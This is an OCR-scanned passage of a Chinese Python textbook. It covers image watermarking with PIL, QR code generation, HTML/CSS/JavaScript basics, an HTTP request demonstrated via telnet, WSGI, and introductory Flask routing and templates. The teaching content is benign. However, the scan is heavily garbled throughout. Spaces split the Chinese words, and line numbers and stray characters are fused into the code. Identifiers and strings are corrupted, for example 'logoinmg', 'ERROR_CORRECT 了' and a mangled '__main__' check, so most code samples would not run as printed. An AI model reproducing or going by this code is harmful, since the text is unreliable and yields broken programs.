观 性 和 完整 性 。 图 片 水 印 可 分 为 可 见 水 印 和 不 可 见 水 印 。 而 网 络 图 片 中 的 水 印 多 为 可 见 水 
印 。 图 片 水 印 多 为 制作 者 所 属 机 构 的 图 标 或 字母 的 缩写 。 下面 就 以 两 种 方式 展示 增加 水 印 
的 原理 。 

例 [ch12_5_2_watermark. py】 


1 from PIL import Image, ImageFont, ImageDraw, ImageEnhance 

2. def strmark(imgpath,markstr): 

总 img = Image.open(imgpath) 

4 imgwidth, imgheight = img. size 

5 draw = ImageDraw.Draw(img) 

6 strlen = len(markstr) 

7 fontwidth = imgwidth//strlen 

8 font = ImageFont.truetype( 'ALGER. TTF', fontwidth) 

9. strwidth = font.getsize(markstr)[0] 

10. imgmark = Image.new("RGBA", (imgwidth, imgheight), (0,0,0,0)) 


3 #(255,255,255,255) 为 白色 , (0,0,0,0) 透 明 
12, draw = ImageDraw. Draw( imgmark) 
43， draw.text(((imgwidth - strwidth)/2, (imgheight - fontwidth)/2), markstr, font = font, 


fill= (255, 255, 255, 90)) 
14. #fil1(255, 255,255,0) 白 色 填 充 , 透 明度 0 表示 透明 ,255 为 不 透明 


15, imgmark. rotate(45) 

16. alpha = imgmark. split()[3] 

17. img. paste( imgmark, box = None, mask = alpha) 
18, return img 

30: 

20. def logomark( imgpath, logopath): 

21, img = Image. open( imgpath) 

22. imgwidth, imgheight = img. size 

23、 logoimg = Image. open(logopath) 

2 if logoimg. mode != 'RGBA': 

25, logoimg = logoimg.convert( 'RGBA') 
26. logoalpha = logoimg. split()[3] 

27. logoalpha = ImageEnhance.Brightness(logoalpha).enhance(0.2) 


28. 井 ImageEnhance. Brightness( image) 返 回 一 个 亮度 加 强 器 实例 

29.， 井 enhancer. enhance(factor) 返 回 一 个 加 强 的 图 像 ,factor 介 于 0 一 1,1 代表 返回 原 图 ,0 代表 返 
回 较 低 亮度 、 对 比 、 颜 色 的 图 片 

30. logoinmg. putalpha( logoalpha) 

31. # 复 制 指定 的 值 到 当前 图 片 的 Alpha 通道 
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32、 logowidth, logoheight = logoimg. size 

人 logobox = ((imgwidth— logowidth)//2, (imgheight - logoheight)//2) 
34. img. paste( logoimg, box = logobox, mask = logoalpha) 

35% return img 

36. 

37. if (_name == ' main _'): 

38. img = strmark("D:\\flower. jpg", 'lnpc') 

290: img. show( ) 

40. img2 = logomark("D:\\flower. jpg", "logo. png") 

41. img2. show( ) 


字符 水 印 与 LOGO 水 印 效果 分 别 如 图 12-4 和 图 12-5 所 示 。 





图 12-4 ”字符 水 印 效果 图 12-5 LOGO 水 印 效果 


12.5.3 生成 二 维 码 


二 维 码 简称 QR Code(Quick Response Code) ,全 称 为 快速 响应 抢 阵 码 , 是 二 维 条 形 码 
的 一 种 ,由 日 本 的 Denso Wave 公司 于 1994 年 发 明 。 现 在 随 着 智能 手机 的 普及 ,已 广泛 应 
用 于 平常 生活 中 ,如 商品 信息 查询 ,社交 好 友 互 动 、 网 络 地 址 访问 等 。 

二 维 码 以 其 快速 的 可 读 性 和 较 大 的 存储 容量 而 被 广泛 使 用 ,代码 由 在 白色 背景 下 黑色 
模块 组 成 的 正方 形 图 案 表示 ,编码 的 信息 可 以 由 各 类 信息 组 成 ,如 二 进 制 数 据 、 字 符 、 数 字 ， 
甚至 汉字 等 。 

Python 下 制作 二 维 码 的 软件 包 为 qrcode, 该 软件 包 是 以 PIL 为 基础 的 ,使 用 前 需要 安 
装 PIL 包 。 安 装 的 方法 为 


>>> import qrcode 
>>> img = qrcode.make("abcdefghijklmnopqrst") 
>>> img. save( "D:\\qrcode. png") 


也 可 以 更 多 地 控制 二 维 码 的 生成 ,如 : 
例 [ch1l2_5_3qrcode01. py】 

import qrcode 

qr = qrcode. QRCode( 


1 

2 

和 version=1, 

4 error_correction = qrcode. constants. ERROR_CORRECT _L, 
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box size= 10, 
border = 4, 


qr.add data( "http://www. lnpc. cn') 
qr. make(fit = True) 

10. img = qr.make image() 

11. img. save('D:\\qrcode02. jpg') 

其 中 : 

参数 version 表示 生成 二 维 码 的 尺寸 大 小 , 取 值 范围 为 1 一 40, 最 小 尺寸 1 会 生成 
21X21 矩阵 的 二 维 码 ,version 每 增加 1, 生 成 的 二 维 码 就 会 添加 4, 例 如 ,version 是 2, 则 生 
成 25X25 和 矩阵 的 二 维 码 。 

参数 error_correction 指定 二 维 码 的 容错 系数 ,分 别 有 以 下 4 个 系数 。 

(1) ERROR_CORRECT_L: 7% 的 字 节 码 可 被 容错 。 

(2) ERROR_CORRECT_M: 15% 的 字 节 码 可 被 容错 。 

(3) ERROR_CORRECT_Q: 25% 的 字 节 码 可 被 容错 。 

(4) ERROR_CORRECT_H: 30% 的 字 节 码 可 被 容错 。 

参数 box_size 表示 二 维 码 里 每 个 格子 的 像素 大 小 。 

参数 border 表示 边框 的 格子 厚度 是 多 少 (默认 是 4) 。 

生成 带 有 图 标的 二 维 码 : 首先 生成 高 容错 性 的 二 维 码 ,打开 LOGO 图 片 文件 ,把 它 的 
大 小 改 为 二 维 码 大 小 的 1/16, 然 后 将 LOGO 图 片 粘 在 二 维 码 的 中 心 位 置 ,最 后 将 图 片 保 存 
为 文件 。 

例 [ch12 5_3qrcode02. py】 


5 
6 
人 
8 
9 


from PIL import Image 
import qrcode 


1 
2 
3 
4. qr = qrcode.QRCode( 

3 version=2, 

6 error_correction = qrcode. constants. ERROR_CORRECT 了 
和 2 box_size= 10, 

8 border=1 

9 -让 

10. qr.add data("http://www. lnpc.cn/") 
11. qr.make(fit = True) 


13. img = qr.make image() 
14. img = img.convert("RGBA") 


16. icon = Image.open("1ogo.png") 
17. img w, img h = img. size 

18. factor = 4 

19. size w = int(inmg w / factor) 
20. size h = int(img h / factor) 


22. icon w, icon h = icon. size 


23. if icon w> size w: 
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24. icon w = size _w 

25. if icon h> size h: 

26. icon h = size h 

27. icon = icon.resize((icon w, icon h), Image.ANTIALIAS) 
28， 间 将 LOG0 图 标 更 改 为 二 维 码 的 1/16 大 小 

29. w = int((img w - icon w) /2) 

30. h = int((img h - icon h) /2) 

31. img. paste(icon，(w h), icon) 

32， 井 将 LoG0 粘贴 到 二 维 码 的 中 心 位 置 

33. img. save(" lnpc. png" ) 


生成 的 二 维 码 与 带 图 标的 二 维 码 效果 分 别 如 图 12-6 和 图 12-7 所 示 。 





图 12-6 生成 的 二 维 码 效果 图 12-7 带 图 标的 二 维 码 效果 


习 题 


一 、 判断 题 

1. PIL 是 专门 用 于 图 像 处 理 的 Python 库 。 

2. PIL 库 的 兼容 库 为 Mypil。 

3. PIL 的 Image 模块 可 以 旋转 图 像 。 

4. PIL 的 ImageDraw 模块 不 可 以 绘制 扇形 。 

5. PIL 的 ImageFont 模块 不 可 以 使 用 矢量 字体 绘制 文本 。 

6. ImageFilter 模块 是 PIL 中 的 滤 镜 模块 。 

7. ImageFilter 模块 不 可 以 实现 浮雕 滤 镜 效 果 。 

8. 常用 的 图 片 添加 水 印 方法 就 是 将 水 印 图 片 释 加 在 原 图 片上 。 
9. Qrcode 模块 不 可 以 生成 带 图 标的 二 维 码 。 

二 、 编程 题 

1. 编程 生成 一 个 验证 码 图 片 。 

2. 编程 生成 一 个 你 所 在 学 院 的 二 维 码 , 要 求 带 有 学 院 LOGO 图 标 。 


se 
wi Ww 


13.1 Web 基础 知识 


13.1.1 HTML 简介 


互联 网 Web 应 用 中 ,传输 的 主要 是 HTML 文档 ,什么 是 HTML? 它 与 一 般 的 文档 有 
何不 同 ? 在 Web 开发 中 需要 什么 样 的 技术 ? 下 面 来 简单 地 介绍 一 下 。 

HTML 是 Hyper Text Markup Language 的 缩写 ,也 就 是 超 文本 标记 语言 , 它 是 用 于 描 
述 网 页 的 一 种 语言 , 它 不 是 一 种 编程 语言 ,而 是 一 种 标记 语言 (Markup Language) ,也 就 是 
使 用 标签 来 描述 网 页 ,浏览 器 不 会 显示 HTML 标签 ,而 是 使 用 标签 来 解释 页 面 的 内 容 。 
例如 : 

<html> 

<body> 

<hl > Hello World </hl > 

</body> 

</html > 

图 13-1 所 示 为 Hello World 网 页 显示 效果 。 

为 了 增强 网 页 的 显示 效果 ,万 维 网 联盟 (W3C) 引 
进 了 CSS( 层 秋 样 式 表 ,Cascading Style Sheets) ,通过 = 2] 
CSS 定义 了 如 何 显示 HTML 元 素 , 解 决 了 内 容 与 表现 
分 离 的 问题 。 通 常 把 样式 存储 在 样式 表 中 ,也 可 以 使 用 
外 部 样式 表 , 外 部 样式 表 (. CSS 文件 ) 可 以 同时 改变 站 
点 中 所 有 页 面 的 布局 和 外 观 , 极 大 地 提高 了 工作 效率 。 

CSS 的 功能 主要 有 添加 背景 ,格式 化 文本 ,格式 化 
边框 ,定义 元 素 的 填充 和 边 距 ,定位 元 素 ,控制 元 素 的 可 见 性 和 尺寸 ,设置 元 素 的 形状 ,将 一 
个 元 素 置 于 另 一 个 元 素 之 后 ,以 及 向 某 些 选择 器 添加 特殊 的 效果 等 。 


Hello World | 


图 13-1 Hello World 网 页 显示 效果 
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下 面 通过 简单 的 示例 ,展示 一 下 CSS 的 作用 : 


<! DOCTYPE html > 
<html> 

<head> 

<style> 

hl {text - decoration:overline;} 

h2 {text - decoration:1ine — through;} 
h3 {text - decoration:underline;} 
</style> 

</head> 


<body> 
<hl > This is heading 1 </hl > 
<h2 > This is heading 2 </h2 > 
<h3 > This is heading 3 </h3 > 
</body> 
</html > 


在 该 HTML 文档 中 ,使 用 了 hl、h2、h3 标签 ,默认 hl、h2、h3 仅 改 变 文本 大 小 ,这 里 使 


用 CSS 对 标签 进行 了 修饰 ,给 hl 增加 了 上 画 线 ,给 h2 增加 了 删除 线 ,给 h3 增加 了 下 面 线 。 
显示 效果 如 图 13-2 所 示 。 





This is heagding 2 


This is heading 3 





图 13-2 CSS 显示 效果 


CSS 虽然 增强 了 网 页 的 显示 效果 ,但 它 仍 然 是 静态 页 面 ,JavaScript 的 引入 增强 了 网 页 
的 动态 效果 。 下 面 的 例子 显示 了 一 个 动态 的 时 钟 : 


<! DOCTYPE html > 

<html> 

<head> 

<script> 

function startTime() 

{ 

var today = new Date( ); 

var h= today. getHours(); 
var m= today. getMinutes(); 
var s = today. getSeconds( ); 
// add a zero in front of numbers<10 
m= checkTime(m); 
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s= checkTime(s); 

document. getElementById( 'txt'). innerHTML = h+":"+m+":"+s; 
t= setTimeout(function(){startTime()},500); 

} 


function checkTime( i) 
{ 
if (i<10) 


{ 
Le 
' 

return i; 


} 
</script > 
</head> 


< body onload = " startTime( )"> 

<div id= "txt"></div> 

</body> 

</html > 

JavaScript 代码 放 在 二 script 二 二 /script 二 之 间 , 通 过 JavaScript 函数 在 网 页 中 显示 了 
一 个 动态 的 时 钟 ,增加 了 网 页 的 交互 性 和 动态 效果 ,如 图 13-3 所 示 。 

Web 应 用 中 ,不 仅 服务 器 通过 网 页 在 客户 端 显 示 一 定 的 信息 ,而 且 客户 端 有 时 也 需要 
把 一 些 信息 传递 给 服务 器 端 ,这 时 就 需要 用 到 表单 。 表 单 是 一 个 包含 表单 元 素 的 区 域 , 如 
图 13-4 所 示 。 用 户 在 表单 中 输入 内 容 提交 给 服务 器 端 。 表 单元 素 包 括 文本 域 (TextArea)、 
下 拉 列 表 、 单 选 按 钮 (Radio-Buttons) 、 复 选 框 (CheckBoxes) ,提交 按钮 等 。 表 单 使 用 表单 标 
签 二 form 二 来 设置 : 


<form> 

username: < input type = "text" name = "username"><br> 
password: < input type = "password”" name = "pwd">< br> 
< input type = "submit" value = "提交 "> 

</form> 


es username: 
CVavascripthtiml PD-o E password: 


| 
| 
‖ 21:39:19 | 


图 13-3 JavaScript 特效 示例 图 13-4 表单 示例 





13;1.2 HTIP 简 介 


在 互联 网 Web 应 用 中 ,主要 有 服务 器 端 和 客户 端 。 客 户 端 首先 向 服务 器 端 发 出 请 求 信 
息 , 请 求 信息 包括 Request Line, 它 描述 的 是 这 个 请 求 的 基本 信息 , 接 下 来 是 HTTP 
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Headers。 服 务 器 端 接 到 请 求 后 会 通过 一 个 HTTP Response 来 响应 这 个 请 求 , 响 应 信息 包 
括 状 态 行 .响应 Headers、HTML 内 容 。 

HTTP 请 求 与 响应 过 程 如 图 13-5 所 示 。 


HTTP 
Headers 


图 13-5 HTTP 请 求 与 响应 过 程 





下 面 通过 Telnet 访问 百度 的 过 程 来 简单 介绍 HTTP。 

(1) 按 Win 十 R 组合 键 打 开 “ 运 行 ” 对 话 框 ,在 “打开 ”下 拉 列 表 框 中 输入 cmd 命令 , 然 
后 单 击 “ 确 定 ” 按 钮 。 

(2) 在 命令 提示 符 中 输入 telnet www. baidu. com 80 后 按 Enter 键 ,可 以 看 到 一 个 黑色 
的 命令 行 窗口 。 

(3) 按 Ctrl 十 ] 组 合 键 ,会 显示 如 下 信息 : 


欢迎 使 用 Microsoft Telnet Client 
Escape 字符 是 'Ctrl+ ]' 
Microsoft Telnet > 


(4) 按 Enter 键 ,进入 黑色 的 输入 框 。 
(5) 输入 如 下 内 容 : 


GET /index. html HTTP/1.1 
Host: www. baidu. com 


输入 以 上 内 容 是 有 时 间 限 制 的 ,最 好 先 写 好 ,保存 到 文件 中 ,然后 整体 复制 进去 。 
(6) 连续 按 两 下 Enter 键 ,会 得 到 百度 的 回 传 结果 : 


HTTP/1. 1 200 OK 

Date: Fri, 13 May 2016 02:38:35 GMT 

Content - Type: text/html 

Content - Length: 14613 

Last - Modified: Tue, 02 Sep 2014 08:55:13 GMT 

Connection: Keep - Alive 

Vary: Accept - Encoding 

Set - Cookie: BAIDUID = 222E1D339E69937E0029978ECAB05782:FG= 1; expires = Thu, 31— Dec—3 
7 23:55:55 GMT; max— age = 2147483647; path = /; domain = .baidu. com 

Set - Cookie: BIDUPSID = 222E1D339E69937E0029978ECAB05782; expires = Thu, 31— Dec— 37 23 
:55:55 GMT; max- age = 2147483647; path = /; domain = .baidu. com 

Set - Cookie: PSTM = 1463107115; expires = Thu，31 - Dec— 37 23:55:55 GMT; max- age= 214748 
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3647; path = /; domain = .baidu. com 
P3P: CP= " OTI DSP COR IVR OUR IND COM " 
Server: BWS/1.1 

X- UA- Compatible: IE= Edge,chrome=1 
Pragma: no ~ cache 

Cache - control: no - cache 

Accept - Ranges: bytes 


<!DOCTYPE html ><! —— STATUS OK ——> 
<html> 
<head> 


下 面 对 该 访问 过 程 进行 分 析 。 

(1) 客户 端 首先 与 百度 服务 器 端 建立 连接 。 

(2) 接着 客户 端 向 服务 器 端 发 出 请 求 : 

GET /index. html HTTP/1.1 

Host: www. baidu. com 

GET 表示 向 服务 器 发 出 读 取 请 求 ; 将 从 服务 器 获取 网 页 数据 ; /表示 URL 的 路 径 ; 
/index. html 就 表示 首页 ; HTTP/1.1 指示 采用 HTTP 的 1.1 版 本 。 目 前 HTTP 的 版 本 
就 是 1. 1, 但 是 大 部 分 服务 器 也 支持 1. 0 版 本 ,主要 区 别 在 于 1.1 版 本 允许 多 个 HTTP 请 求 
复 用 一 个 TCP 连接 ,以 加 快 传输 速率 。 

(3) 服务 器 端 回 传 响应 信息 : 

HTTP/1. 1 200 OK 


Date: Fri, 13 May 2016 02:38:35 GMT 
Content - Type: text/html 


响应 信息 包括 Header 和 Body 两 部 分 ,Header 部 分 重要 的 信息 有 : 200 OK 表示 响应 
成 功 。 除 了 200 响应 外 ,还 有 其 他 的 响应 类 型 : 404 Not Found 响应 表示 网 页 不 存在 ; 500 
Internal Server Error 响应 表示 服务 器 内 部 出 错 …… 


Content - Type: text/html 


Content-Type 指示 响应 的 内 容 类 型 ,这 里 是 text/html, 表 示 HTML 网 页 。 浏览 器 就 
是 依靠 Content-Type 来 判断 响应 内 容 类 型 的 ,类 型 可 能 为 网 页 .图 片 .视频 或 者 音乐 。 

Header 中 还 包括 其 他 一 些 信 息 , 这 里 不 再 详细 说 明 。Body 中 包括 的 就 是 HTML 内 
容 ,浏览 器 解析 后 , 即 可 显示 出 来 。 

Web 应 用 使 用 的 HTTP 采用 了 非常 简单 的 请 求 -响应 模式 ,从 而 大 大 简化 了 开发 。 当 
编写 一 个 页 面 时 ,只 需 在 HTTP 响应 中 把 HTML 发 送出 去 ,不 需要 考虑 如 何 附带 图 片 、. 视 
频 等 ,HTTP 请 求 有 GETO 方 法 和 POSTO 方 法 ,GETO 方 法 仅 请 求 资源 ,POSTO 方 法 会 
附带 用 户 数 据 。 因 此 ,可 以 看 出 Web 应 用 中 ,浏览 器 与 服务 器 之 间 就 是 请 求 与 应 答 的 关系 。 


13.1.3 WSGI 与 Python 框架 
上 一 小 节 介 绍 了 在 Web 应 用 中 ,客户 端的 浏览 器 向 服务 器 端 发 出 请 求 , 服 务 器 端 向 客 
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户 端 发 出 响应 。 在 这 个 过 程 中 ,服务 器 需要 解析 客户 的 请 求 ,把 响应 的 内 容 传输 给 客户 端 ， 
这 个 工作 是 非常 复杂 烦琐 的 ,如 果 自 己 实现 该 功能 将 是 一 件 吃力 不 讨好 的 事情 。 好 在 已 经 
有 了 WSGI(Web Server Gateway Interface) ,WSGI 是 一 个 规范 ,有 了 它 可 以 避 开 TCP 连 
接 、HTTP 原始 请 求 和 响应 格式 ,专心 于 Web 业务 。 

WSGI 把 服务 端 分 为 两 部 分 : Web Server(Web 服务 器 ) 和 Web Application(Web 应 用 
程序 ), Web Server 负责 接收 客户 端的 请 求 , 调 用 Web 应 用 程序 ,并 将 Web 应 用 程序 处 理 好 
的 结果 返回 给 客户 端 。WSGI 既 要 实现 Web 服务 器 ,也 要 实现 Web 应 用 程序 。 

Web Application 用 于 处 理 Web 业务 逻辑 ,实现 为 一 个 可 调用 对 象 。 下 面 举 一 个 简单 
的 例子 。 

例 [webapp. py】 

和 提 一 -coding: utf-8 一 # 一 

def application (environ, start response): 

有 response_body = b'Hello Worldl 

4 # HTTP 响应 状态 

3 status = '200 OK’ 

6 # HTTP 响应 头 ,注意 格式 

7 headers = [('Content - type', 'text/plain; charset = UTF— 8')] # HTTP Headers 
8 

9 


# 将 响应 状态 和 响应 头 交 给 WSGI server 

10, start_response( status, headers) 

11，， 井 返回 响应 正文 

Pb return [response_body] 

这 里 的 可 调用 对 象 为 application() 函数 ,接收 以 下 两 个 参数 。 

(1) 一 个 字典 ,该 字典 可 以 包含 客户 端 请 求 的 信息 以 及 其 他 信息 ,可 以 认为 是 请 求 上 下 
文 ,一 般 叫 作 environment, 这 里 为 environ。 

(2) 一 个 用 于 发 送 HTTP 响应 状态 (HTTP Status) ,响应 头 (HTTP Headers) 的 回调 
函数 。 同 时 ,可 调用 对 象 的 返回 值 是 响应 正文 (Response Body) ,响应 正文 是 可 迭代 的 ,并 包 
含 了 多 个 字符 串 。 

Python 中 有 一 Web Server, 它 就 是 Python 内 置 的 模块 一 一 Wsgiref, 它 是 用 纯 Python 
编写 的 WSGI 服务 器 ,完全 符合 WSGI 标准 ,可 供 开发 和 测试 使 用 。 

例 [server. py】 

闫 ,一 = oding: f=8 一 二 
from wsgiref. simple_server import make_ server 
from webapp import application 


httpd = make server('', 8000, application) 
# 创建 一 个 Server 实例 ,监听 的 地 址 未 指定 ,端口 为 8000, 可 调用 的 对 象 为 application 
print("Serving on port 8000...") 


oOouAWDNDr- 


# 将 持续 提供 服务 ,直至 进程 被 结束 
10. httpd. serve_forever() 


运行 server. py, 服 务 器 开始 监听 8000 端口 ,由 application() 函数 来 处 理 Web 请 求 。 在 
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客户 端 运 行 浏览 器 ,在 地 址 栏 输入 http://127. 0. 0. 1:8000, 即 可 看 到 “Hello World!” 字 样 
的 网 页 ,如 图 13-6 所 示 。 
柯 人 | 


[eS ener rr RE 


Hello World! 





图 13-6 WSGI 生成 的 网 页 


从 上 面 的 例子 可 以 看 出 ,针对 客户 端的 一 个 URL 请 求 ,在 服务 器 端 有 一 个 application() 
函数 对 客户 端的 请 求 做 出 响应 。 因 此 ,服务 器 端 需要 处 理 两 个 问题 : 其 一 是 针对 不 同 的 
URL 请 求 , 如 何 调度 不 同 的 application 做 出 响应 ; 其 二 是 每 个 application() 函数 如 何 做 出 
响应 。 在 Web 应 用 开发 中 ,如 果 软 件 研 发 人 员 仔 细 地 处 理 每 个 细节 ,那么 ,他 就 要 浪费 大 量 
的 时 间 处 理 与 业务 逻辑 关系 不 大 的 事务 。 好 在 现在 Web 编程 领域 出 现 了 大 量 的 Web 框 
架 , 可 以 帮助 程序 员 进 行 Web 程序 设计 ,使 他 们 将 精力 集中 于 业务 逻辑 的 研究 。 由 于 基于 
Python 的 WSGI 开 发 相对 较为 容易 ,现在 市 面 上 Python 的 Web 框架 很 多 ,有 10 多 个 ,下 
面 介绍 一 下 较为 流行 的 几 个 。 

1. Django 

Django 应 该 是 最 出 名 的 Python 框架 。Django 走 大 而 全 的 发 展 策略 ,最 出 名 的 是 其 全 
自动 化 的 管理 后 台 : 只 需 使 用 起 ORM ,做 简单 的 对 象 定义 , 它 就 能 自动 生成 数据 库 结 构 ,以 
及 全 功能 的 管理 后 台 。 有 人 形象 地 称 为 大 而 全 的 “海军 ”。 

2. Flask 

Flask 是 一 个 用 Python 编写 的 轻 量 级 Web 应 用 框架 。 这 是 基于 Werkzeug WSGI 工 
具 箱 和 Jinja2 模板 引擎 进行 高 层 研发 的 。Flask 也 被 称 为 microframework, 因 为 它 使 用 简 
单 的 核心 ,用 extension 增加 其 他 功能 。Flask 没有 默认 使 用 的 数据 库 、 窗 体验 证 工具 ,而 是 
由 程序 员 自 己 决 定 怎样 进行 Web 开发 ,灵活 性 是 Flask 的 显著 特点 。Flask 的 官网 地 址 是 
http://flask. pocoo. org/ ,与 Django 相 比 ,有 人 则 称 为 灵活 强悍 的 “海盗 ”。 

3. Tornado 

Tornado 是 Tornado Web Server 的 简称 ,是 异步 非 阻塞 IO 的 Python Web 框架 ,从 名 
字 上 看 就 可 以 知道 它 可 以 用 作 Web 服务 器 ,同时 它 也 是 一 个 Python Web 的 开发 框架 。 最 
初 是 在 FriendFeed 公司 的 网 站 上 使 用 .FaceBook 收购 了 之 后 便 开 源 了 出 来 。 其 最 大 的 优 
势 在 于 使 用 了 异步 非 阻塞 的 IO 技术 ,能 够 作为 大 流量 网 站 的 开发 框架 。 

4. Web2py 

Web2py 是 全 栈 式 Web 框架 ,也 是 一 个 全 功能 的 基于 Python 的 Web 应 用 框架 , 旨 在 
敏捷 快速 地 开发 Web 应 用 ,具有 快速 、 安 全 以 及 可 移植 的 数据 库 驱 动 的 应 用 ,兼容 Google 
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App Engine。 
这 里 不 准备 比较 评价 每 个 Web 框架 的 优 劣 ,只 是 从 初学 者 容易 理解 上 手 , 并 且 也 较为 
流行 的 角度 ,选择 Flask 作为 学 习 研 究 的 Web 框架 。 


13.2 基于 Flask 的 Web 开发 


13.2.1 Flask 的 安装 


1. Flask 安装 

Windows 下 : C:\Python34>pip install Flask 。 
Python 3.4 会 自动 下 载 .安装 以 下 Flask 组 件 : 
Flask — 0.11— py2. py3 - none — any. whl 

Werkzeug - 0.11.10 - py2.py3 - none - any. whl 

Jinja2 - 2.8 - py2. py3 - none — any. whl 

click — 6.6. tar.gz 


itsdangerous — 0.24. tar.gz 
MarkupSafe — 0.23. tar. gz 


这 些 组 件 会 随 着 时 间 的 推移 而 版 本 有 所 不 同 , 功 能 有 所 变化 。 
2. 检测 安装 是 否 成 功 
安装 完成 后 ,执行 以 下 代码 : 


C:\Python34 > python 
>>> import flask 


导入 Flask 模块 , 若 没 有 错误 , 则 表明 Flask 已 经 成 功 安装 ,可 以 进行 Flask 开发 了 。 

3. 牛刀 初试 

Flask 开发 环境 安装 完成 后 ,就 可 以 进行 Web 开发 了 ,首先 需要 导入 Flask 模块 ,决定 
由 哪个 函数 来 处 理 特定 的 URL 请 求 , 在 Flask 中 由 路 由 器 来 完成 这 一 功能 。 

例 [hellol. py】 


from flask import Flask 
app = Flask(_name ) 


@app. route( '/') 
def hello world(): 
return 'Hello World!' 


if name == "main _': 


app. run( ) 
下 面 来 执行 这 个 Web 应 用 程序 。 


C:\Python34 > python hello.py 
* Running on http://127.0.0.1:5000/ 


Dowaouw wb 
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打开 浏览 器 ,在 地 址 栏 中 输入 http://127. 0. 0. 1:5000/, 就 能 看 到 来 自 Flask 的 问候 ， 
Hello World 。 

(村 说 明 : 第 1 行 ,从 Flask 模块 导入 Flask 类 。 这 个 类 的 实例 化 将 会 是 WSGI 应 用 。 

第 2 行 ,创建 一 个 Flask 类 的 实例 ,传递 给 它 的 是 模块 或 包 的 名 称 , 这 里 为 _name _, 即 
为 该 实例 的 名 称 , 这 样 Flask 才 会 知道 去 哪里 寻找 模板 .静态 文件 。 

第 4 行 , 用 装饰 器 @app. route('/') 告 诉 Flask 下 面 的 函数 是 处 理 哪个 URL 请 求 的 。 
这 里 的 “/” 表 示 默 认 主 页 。 

第 5 行 ,定义 了 一 个 函数 ,该 函数 是 用 于 处 理 route() 装 饰 器 的 URL 请 求 的 。 

第 6 行 ,return 返回 的 就 是 在 网 页 中 显示 的 内 容 。 

第 9 行 , 函 数 run() 启 动 本 地 服务 器 来 运行 Web 应 用 。if_name_ 二 二 ' main _'; 确 
保 服 务 器 只 会 在 该 脚本 被 Python 解释 器 直接 执行 的 时 候 才 会 运行 ,而 不 是 作为 模块 导入 
的 时 候 。 

上 面 函 数 返回 的 网 页 过 于 简单 ,下 面 返回 给 客户 端 一 个 含有 格式 控制 符 的 网 页 。 

例 [hello2. py】 


from flask import Flask 
app = Flask(_name ) 


1 

2 

3 

4. @app. route('/') 
5. def hello world(): 
6 

7 

8 

9 


return '"' 

<html> 

<head> 
网 <title> Home Page </title> 
10. </head> 
11. <body> 
12. <hl>Hello,World!</hl> 
13. </body> 
14. </html >'"" 
45 
16. if _name == main 
17 app. run( ) 
执行 上 述 代 码 ,在 客户 端 浏 览 器 中 就 可 以 看 到 一 个 完整 而 简单 的 网 页 了 。 
4. 更 多 的 URL 网 页 


刚才 提供 的 URL 只 能 访问 根 目录 \, 只 要 定义 更 多 的 路 由 器 ,就 能 响应 更 多 的 URL 请 


求 。 刚 才 的 程序 只 能 在 本 地 (127. 0. 0.1) 访 问 ,外 网 不 能 访问 ,下 面 给 网 页 增加 更 多 的 功能 。 
例 [hello3. py】 
1. from flask import Flask 
2 
3. app = Flask(_ name ) 
4. 
5. @app. route('/') 
6. @app.route('/index') 
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7. def hello world(): 
8. return "Hello World!' 


10. (@app. route('/user/') 
11. def hello user(): 
12. return "< hl > Hello user </hl >" 


Ei 本 
14. if name == ' main ': 
15; app. run( host = '0.0.0.0',port = 80, debug = True) 


执行 Hello3. py 程序 后 ,在 浏览 器 中 可 以 输入 多 个 URL,http://127. 0.0.1; http:// 
127. 0.0.1/index; http://127.0.0.1/user/, 如 图 13-7 所 示 。 程 序 的 第 5 行 、 第 6 行 定义 
了 两 台 路 由 器 ,并 且 都 指向 hello_world() 函 数 ; 第 15 行 ,app. run() 函 数 增加 了 三 个 参 
数 : host='0. 0. 0.0' 使 程序 不 仅 监听 127. 0. 0. 1 这 个 地 址 ,还 监听 该 机 的 任 一 地 址 ; port= 
80 指定 程序 监听 的 端口 ,这 里 使 用 了 默认 的 80 端口 ; debug= True 指定 服务 器 处 于 调试 模 
式 , 以 方便 调试 程序 ,程序 处 于 生产 环境 时 不 应 设 为 该 值 。 


DO wn -oe 





图 13-7 不 同 URL 访问 效果 


13.2.2 模板 


通过 函数 返回 Web 的 HTML 页 面 是 一 个 非常 不 明智 的 行为 。 因 为 Web 网 页 包含 
了 大 量 的 格式 控制 符 、 文 字 、 图 片 、 音 视频 文件 ,以 及 CSS、JavaScript 文件 等 。 通 过 一 个 
return 语句 返回 内 容 丰 富 、 格 式 复 杂 的 网 页 显然 是 不 合理 的 ,而 且 程序 员 还 要 做 好 
HTML 转 义 工作 以 保证 应 用 程序 的 安全 。Flask 中 通过 模板 向 客户 端 返回 内 容 丰 富 、 格 
式 复 杂 的 网 页 。 

为 了 更 好 地 管理 Web 文件 ,这 里 建立 一 个 文件 夹 Webapp， 其 下 创建 子 文件 夹 用 于 存 
放 模 板 ,CSS、JavaScript 文件 ,程序 文件 等 。Webapp 文件 夹 的 结构 如 下 所 示 : 


Webapp 

a - /templates ”<-- 用 于 存放 模板 

- — /config < 一 -用 于 存放 配置 文件 

a 一 /static/ < 一 用 于 存放 静态 文件 ,包括 图 片 JavaScript 或 者 CSS 之 类 的 文件 
证 — /tmp <-- 用 于 存放 临时 文件 
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下 面 以 微 博 系统 为 例 ,说 明 模板 的 使 用 。 
1. 模板 简化 了 网 页 设计 
第 一 个 模板 ,index. html: 
< htm]l > 
<head > 
<title>{{title}} - 微 博 </title> 
<meta http - equiv = "Content - Type" content = "text/html; charset = UTF — 8" /> 
</head> 
<body> 
< hl > 您 好 ,，{{user. nickname}}!</hl > 
</body> 
</html > 
这 个 模板 与 普通 的 HTML 文件 是 一 样 的 ,包含 大 量 的 格式 控制 符 , 可 以 使 用 
Dreamwaver 等 编辑 软件 进行 编辑 ,唯一 的 区 别 是 文件 内 部 摊 杂 了 一 些 以 {{...}} 组 成 的 动 
态 内 容 占 位 符 。 程 序 运 行 时 ,{1...)} 被 views01. py 传 过 来 的 参数 所 替换 ,从 而 实现 显示 动 
态 内 容 的 目的 。 
例 【views01. py】 


#9 一 * 一 encoding:utf-8 一 x* 一 
from flask import Flask, render template 


app = Flask(_name ) 


@app. route( '/') 
@app. route( '/index') 
def index(): 
user = { 'nickname': ' 张 三 '} 
10. return render template("index. html"， 
和 title = ' 首 页 '， 
各 user = user) 


14. if _name == ' main_': 
5; app. run( host = '0.0.0.0',port = 80, debug = True) 


(全 说明: 第 2 行 ,从 Flask 框架 导入 了 一 个 叫 render_template() 的 新 函数 ,并 用 这 个 
函数 来 泻 染 模板 。 

第 9 行 ,定义 了 一 个 user 字典 ,nickname 的 值 为 “ 张 三 ”。 

